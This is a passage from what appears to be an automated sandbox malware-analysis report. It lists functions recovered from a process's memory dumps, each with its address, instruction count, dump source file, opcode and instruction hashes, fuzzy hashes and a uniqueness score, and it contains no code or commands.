              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6291f595ad923cc5251892c2f36391eaf183d66f967e1d0dbf4f793235e89768
              • Instruction ID: 3010f654f263a7a510d97b90b221463759f7e634c1d08e82c1eb592c3df607ed
              • Opcode Fuzzy Hash: 6291f595ad923cc5251892c2f36391eaf183d66f967e1d0dbf4f793235e89768
              • Instruction Fuzzy Hash: B6015AB091450E9EEF89EB78C44C2BE77B0FF18304F20447AD81ED2190EE31A149CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF66FA8 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fd95113831a5c3ba4691a72f6d87bb5f1769cd1f30d1fdc593a4e5387485e8c7
              • Instruction ID: 31008f86b0ad125111d7756e1335e08e950ebd4d0585ca41f59e5724029ed5ae
              • Opcode Fuzzy Hash: fd95113831a5c3ba4691a72f6d87bb5f1769cd1f30d1fdc593a4e5387485e8c7
              • Instruction Fuzzy Hash: D4019EB481955E8EEB89EB38C8591BD77E0FF18300F50047EE81EC6082EE36A618C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF7D421 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a04cf57daeaa1d20022221f5c4e81e7f7d6f831a4e47b08c9bbd323845491e8
              • Instruction ID: f6eaf8181f1fdfb8f72267705cb044ca33cf035987f63e62937a20811792e23d
              • Opcode Fuzzy Hash: 4a04cf57daeaa1d20022221f5c4e81e7f7d6f831a4e47b08c9bbd323845491e8
              • Instruction Fuzzy Hash: 370148B091591E8EEB89EF78C44D2BE77A0FF18305F50087AD80AC6190DB32A1A4CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF508EF Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9c93c29811407ac8878da583f61813a39ccbe9d5f1979704c82deeba2e1d7f5c
              • Instruction ID: 24d35ee3238cac2517e39d22f2ec7960dcd1bde4bb837fcc1ad835e9c0a70814
              • Opcode Fuzzy Hash: 9c93c29811407ac8878da583f61813a39ccbe9d5f1979704c82deeba2e1d7f5c
              • Instruction Fuzzy Hash: 3E01FDB2D0880D4EEF4AEB74C499AEDB7A2FF18310F0541B5C60AD7197CE24B84A8B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5332B Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d257ece706e39671a4f96567061f96a29da238d2d8e1a1a7ca72ed155ed88281
              • Instruction ID: 8989fa30e025d1b87a70a6f1dff22db7bb37b994195fe282794fb6fa85887efc
              • Opcode Fuzzy Hash: d257ece706e39671a4f96567061f96a29da238d2d8e1a1a7ca72ed155ed88281
              • Instruction Fuzzy Hash: 7A014BB0D1891E9EEB91FB7CC88C2BA7BE4FF58301F500976E918C21A1EE35E5588750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5273D Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c683e661f9a54103675ee5327e26f0ba0b6d96105ee78a3aa19a63b569cda0e7
              • Instruction ID: a9b2b968c7fcee6ca6134cd8ec3af152237061846401f3c0d29227f983a40508
              • Opcode Fuzzy Hash: c683e661f9a54103675ee5327e26f0ba0b6d96105ee78a3aa19a63b569cda0e7
              • Instruction Fuzzy Hash: 0901A2B091E64E4FE752EB74C85C1B97BE0FF59300F4545B6DA08C70A2EE35E8488741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5745C Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548859871.00007FFBACF55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF55000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf55000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df341d466d0113c10a2af3b3b5618e79db619f0cffb0d6363dd88b0a98f96369
              • Instruction ID: 82db644f0021961020dd5a8abfe8bde11d3fd1def7547428ffe36f6f323866e9
              • Opcode Fuzzy Hash: df341d466d0113c10a2af3b3b5618e79db619f0cffb0d6363dd88b0a98f96369
              • Instruction Fuzzy Hash: 0F11FAB4E0961E8FDBA5DA28C8847E9B3B4AB58301F1041E6D50DA2345DB399EC9CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF71744 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b12030a53562eadf4e2bc00b48b8afbf02d13dbfae635333b8c7e08ba79fe46d
              • Instruction ID: 8309b55336ccef78fcdc1dc962648862316e90fc055e1113bfe1b3c56a8a3f41
              • Opcode Fuzzy Hash: b12030a53562eadf4e2bc00b48b8afbf02d13dbfae635333b8c7e08ba79fe46d
              • Instruction Fuzzy Hash: 4A1109B0E256088FEB45EBB8C4996ECBBF1FF48300F204079D509E7292DE39A845CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF663EB Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2188b2ca51f9c5c8a8a05752b7a4adfecef088f31d087f834a581301aad1313d
              • Instruction ID: 26d25ae118c5f9bc8db9f131b1dc59af08576933c2d7303a8b036426face8a27
              • Opcode Fuzzy Hash: 2188b2ca51f9c5c8a8a05752b7a4adfecef088f31d087f834a581301aad1313d
              • Instruction Fuzzy Hash: 3C01B1B880868E8EEB99EF78C8592B97AE0FF54305F00053AE81CC2191CF35A158C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5A629 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db6632129f391802f41e5fb5ce0cc67ee01a2a3fb191af3b79b4165095a218ae
              • Instruction ID: 3c70511d6791a13617b059d18e3c23983643462422a6499d996d2e8c85e91f22
              • Opcode Fuzzy Hash: db6632129f391802f41e5fb5ce0cc67ee01a2a3fb191af3b79b4165095a218ae
              • Instruction Fuzzy Hash: 43015EA095E68E4EE752EB34885D1B97BF0EF59300F4509F7D908C70A2DA25E8588711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF61DEB Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 71a3da1ca6bc6aa5995f87bd239b6ec553881f19ad0f229a87b43cb973c76f2b
              • Instruction ID: 0f7a74fef7cde31e7d78a657938421e6b91aecd7b35798c522a90469a1b06c05
              • Opcode Fuzzy Hash: 71a3da1ca6bc6aa5995f87bd239b6ec553881f19ad0f229a87b43cb973c76f2b
              • Instruction Fuzzy Hash: 6D016DB491A54E8AEF59EF74C45D2F97BA0EF29301F5044BED80EC2191DE76E558C600
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF620D0 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6ddcbe84b9a2899bf4615a840a3be4173f486a2e3cbb53a17969f5f035fa29c5
              • Instruction ID: d7d983de33614a3294e7634aff2e2ef3386e569d5180a497fdd3ba709b87bf52
              • Opcode Fuzzy Hash: 6ddcbe84b9a2899bf4615a840a3be4173f486a2e3cbb53a17969f5f035fa29c5
              • Instruction Fuzzy Hash: 970146B491895E9EEB91EBB8C84C6BEB7E4FF18304F004872D80DC3061EE35E1848B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF61978 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a2bba94060a1c0e0c9d57eef6fc6c3f225c97be0ff6719eb6378259dae44166
              • Instruction ID: 9774460df0c1f09275639a2bef516cb30579a1853ee67a532b4ebdfbcef1a4a0
              • Opcode Fuzzy Hash: 1a2bba94060a1c0e0c9d57eef6fc6c3f225c97be0ff6719eb6378259dae44166
              • Instruction Fuzzy Hash: 2601ADB080954E8BEF59EF34C4982BE3BE0EF59300F1049BEE80BC2091DE72A558CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF70BA1 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dcacd13be7e9c3a5063d830491cebc4bded81938f67fe2501630f3c92254bb73
              • Instruction ID: 9a3680d4114a45623e8328e735e33f35f3d0e45e0dd61f7af314170d541ff25b
              • Opcode Fuzzy Hash: dcacd13be7e9c3a5063d830491cebc4bded81938f67fe2501630f3c92254bb73
              • Instruction Fuzzy Hash: 1A0128B091994E9EEB89EF78C44D2BE77A0FF18305F50087AD81AE2191DF31A654CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF517BD Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6cdfc92053739aa9465018772d93aab9eea8b82a95c558a5f73e0160db450b60
              • Instruction ID: d1a84afbb9cecdb920b6cfd8f2a9a340cf36e8c59e3591a307e6370eef493c7f
              • Opcode Fuzzy Hash: 6cdfc92053739aa9465018772d93aab9eea8b82a95c558a5f73e0160db450b60
              • Instruction Fuzzy Hash: BA01D1B080968D8FDF95DF38D4592BA3BE0EF65301F4040BAE909C2092DB7AE854C780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50200 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d181d2342366835da2ed2c5cb29255612e7ec1e17427ddc2cefcaca17981c0d
              • Instruction ID: 6935b80b2d0261898a2c43e11b120badc478fa614d96a07a0152dc284e5d3f9c
              • Opcode Fuzzy Hash: 4d181d2342366835da2ed2c5cb29255612e7ec1e17427ddc2cefcaca17981c0d
              • Instruction Fuzzy Hash: 7C0169B0819A0E8AEB59EB34C4582BD77A0FF18305F50097EE90EC61D2DF36A995CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50208 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dde3a0f1839f505d531d7ac5fe1340d53d14f94bc775f74ad31d611e91870daf
              • Instruction ID: 283473a1fcae19c0482a0cb7660e045889ca2bd60b74a9c3591d01a43f3138e3
              • Opcode Fuzzy Hash: dde3a0f1839f505d531d7ac5fe1340d53d14f94bc775f74ad31d611e91870daf
              • Instruction Fuzzy Hash: E30169B0819A1E8FEB59EB74D45D2BA77A0FF18304F50097EE90EC2191DF36A959CA10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BC69 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9e4fa403197bd71c51be3a11980f18bb2dd60dbe02788a145b18c2bdf4f564f
              • Instruction ID: e8a343d922df288343a34f4f1665b2430d01710d787708d84a0d8cd18257ffef
              • Opcode Fuzzy Hash: a9e4fa403197bd71c51be3a11980f18bb2dd60dbe02788a145b18c2bdf4f564f
              • Instruction Fuzzy Hash: 82018BB080968E8FEB969F34C85D2B93BA0EF16200F4005BAE918C2192DA3599188780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF67A41 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c75f7aeb6047dd01d2a51bc1c81320bbcf1db5c0c8693810d7c8658d8e07443
              • Instruction ID: 6c445ce1a81d506265c63418e020ff5dd32cc22b416e69452c261210731630ba
              • Opcode Fuzzy Hash: 4c75f7aeb6047dd01d2a51bc1c81320bbcf1db5c0c8693810d7c8658d8e07443
              • Instruction Fuzzy Hash: 3D01DBF0D0AA598EE7A5EB38C4593A9B7B1FF15300F0040AAD84DD6162DF369985DB01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF66AD1 Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 053dac6370f96773a10d821793ff1752228afa9b8ca85eb752beb72b7809a2fd
              • Instruction ID: f57c5da4a438976f7b3dd6a1922e23e62ca8b01c9738fdaa88c7ba481c8ecce6
              • Opcode Fuzzy Hash: 053dac6370f96773a10d821793ff1752228afa9b8ca85eb752beb72b7809a2fd
              • Instruction Fuzzy Hash: F7F081B594E69E9FEB52EB74CC592BA7BE4EF15301F0404B6D818C2091DA79E148C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50D20 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8d6525229f62a73c8265ea96fb4f311c0e4e5dd1445b39bdde90db6c079d1f0b
              • Instruction ID: 652468ac641aaaee9cab5cad1e372b55f4336350a5d775b56a79fe8a0b380192
              • Opcode Fuzzy Hash: 8d6525229f62a73c8265ea96fb4f311c0e4e5dd1445b39bdde90db6c079d1f0b
              • Instruction Fuzzy Hash: E2F0F4B1C2954E4AEBA59678D80C3F9B7A0FF15314F00057ADC0DC1481CF7669488201
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5C069 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a4ef5a3ff8e23e8e402bdd491cd66b62809631d663bb333fcae0b429e970dbd
              • Instruction ID: 770f677c1eaec3650106b5713ee0ac97be6b39226c5382769698954f88715bdf
              • Opcode Fuzzy Hash: 4a4ef5a3ff8e23e8e402bdd491cd66b62809631d663bb333fcae0b429e970dbd
              • Instruction Fuzzy Hash: 7601D6B580D38E4FDB969F3488191A93FA0EF1A301F5005BAD909C6092CA35DD58C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF775F1 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 897878ec9e9d1813f37eed1e8e8104f80a84488a6caebcc7f11835e3106e8e6f
              • Instruction ID: f43cb40ac90a76f68824ac915e98c50d9fb6afc04affd1fbbe2b553c2d3fa576
              • Opcode Fuzzy Hash: 897878ec9e9d1813f37eed1e8e8104f80a84488a6caebcc7f11835e3106e8e6f
              • Instruction Fuzzy Hash: 4C011DB092950E8FEB42EB78C84C5BDB6E4FF58304F504876E80CC6095DE35E554CA50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF70E51 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be19f8ce4ffb3da60cd2c8ff9099ca3be648fb87eb98c8023b10d57cf840e944
              • Instruction ID: 45a16df8f6ceeab9030c3e82f1417052735adcd6c7685fa514f61b20a06da6b1
              • Opcode Fuzzy Hash: be19f8ce4ffb3da60cd2c8ff9099ca3be648fb87eb98c8023b10d57cf840e944
              • Instruction Fuzzy Hash: D001F2B092991E9EEB91EB78C84C6FE77E0FF19301F504976D818C30A1EA34A5988B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF76EF1 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 376981c870b0314476eb5e98b879454c504dcedc8649372d9d5e4d470af7eadb
              • Instruction ID: 374add1b82376a6f618d5fb1aa84fd2b95d4c9523a7f8ffa302c61eb1ed47d5f
              • Opcode Fuzzy Hash: 376981c870b0314476eb5e98b879454c504dcedc8649372d9d5e4d470af7eadb
              • Instruction Fuzzy Hash: 950119B4D2990E8EEB95EF78C84C6ED76E4FF58300F504576E808C61A1EE35E558CA50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6FF81 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: adb59a36c80c5cdd3262106db7db6f3e5967957e36a1db3a1b3bf462f5356a2e
              • Instruction ID: 3c9595eb815fa5d460399eca386d8933d65c9bba3d180713506638c50d29eaf3
              • Opcode Fuzzy Hash: adb59a36c80c5cdd3262106db7db6f3e5967957e36a1db3a1b3bf462f5356a2e
              • Instruction Fuzzy Hash: 25018CB092999E8FE741EF38C44C6BA77E0FF19304F400976E808C20A1DE35E1588610
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF70191 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c7e9eeb100bbc9124fa981ba4f25b9cd31428b990329337fc451338b3a47acf
              • Instruction ID: 5aef6b24c6911fa70f316051020a8443b8bdee9016d2d489db2f94552d019d9f
              • Opcode Fuzzy Hash: 3c7e9eeb100bbc9124fa981ba4f25b9cd31428b990329337fc451338b3a47acf
              • Instruction Fuzzy Hash: 190146B091991E9EEB81EB78C48C2BE76E0FF18301F1108B2D809D2061EB74E5888B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6DC11 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5ae914a2ec4d1c82189bf0bc7bbf0e3e7da515be32d6535e1005b82c3e96dda2
              • Instruction ID: 7598ae2e8e61a98c3b491a3ebe80b4056d032da80df284b3c35ce376e46d2b98
              • Opcode Fuzzy Hash: 5ae914a2ec4d1c82189bf0bc7bbf0e3e7da515be32d6535e1005b82c3e96dda2
              • Instruction Fuzzy Hash: E5018CB092A94E8EEB51FF78C84C6B977E0FF48304F4044B6E80CC60A1DE74E158C600
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF71381 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fef60152905863a577d2adefb13fa6f1198674a5994308f982c0c9a4e2de781b
              • Instruction ID: ff20fb5269a7619ed88adf20ea62a37d50461986187fb1a2ddcb032ee16260cd
              • Opcode Fuzzy Hash: fef60152905863a577d2adefb13fa6f1198674a5994308f982c0c9a4e2de781b
              • Instruction Fuzzy Hash: 4701F6B492891E8EEB91EB78C44D6BE76E4FF58300F204976E81DD25A1EA34A5488B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF501C8 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9399f66b1a298468a47e095b9c97b896a8a1c0f299e2aec7b22c9d6a66cdcc0c
              • Instruction ID: f80fe69ef82f453e18a8cff048a17f8994fb0ef19e3c759dc1d163f399e1a4bb
              • Opcode Fuzzy Hash: 9399f66b1a298468a47e095b9c97b896a8a1c0f299e2aec7b22c9d6a66cdcc0c
              • Instruction Fuzzy Hash: C2F0AFB080950E8FEF95EE38D4492FA37A4EF15304F40447AE90EC2081CA36E894CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6EC71 Relevance: .0, Instructions: 39COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ffb21952978aa88c21192b43593ead7382370ff4b1e6deccb5a12ced339f132f
              • Instruction ID: e6af9186e03b03b1b4cb49479d7db3e8ea1dd0ecbae6c7a5c56986ae34d469c3
              • Opcode Fuzzy Hash: ffb21952978aa88c21192b43593ead7382370ff4b1e6deccb5a12ced339f132f
              • Instruction Fuzzy Hash: F1F0AFB191956E9EE741EB78C94D5BA73E0FF08304F400872E818C7096EF34E608D750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6DA91 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
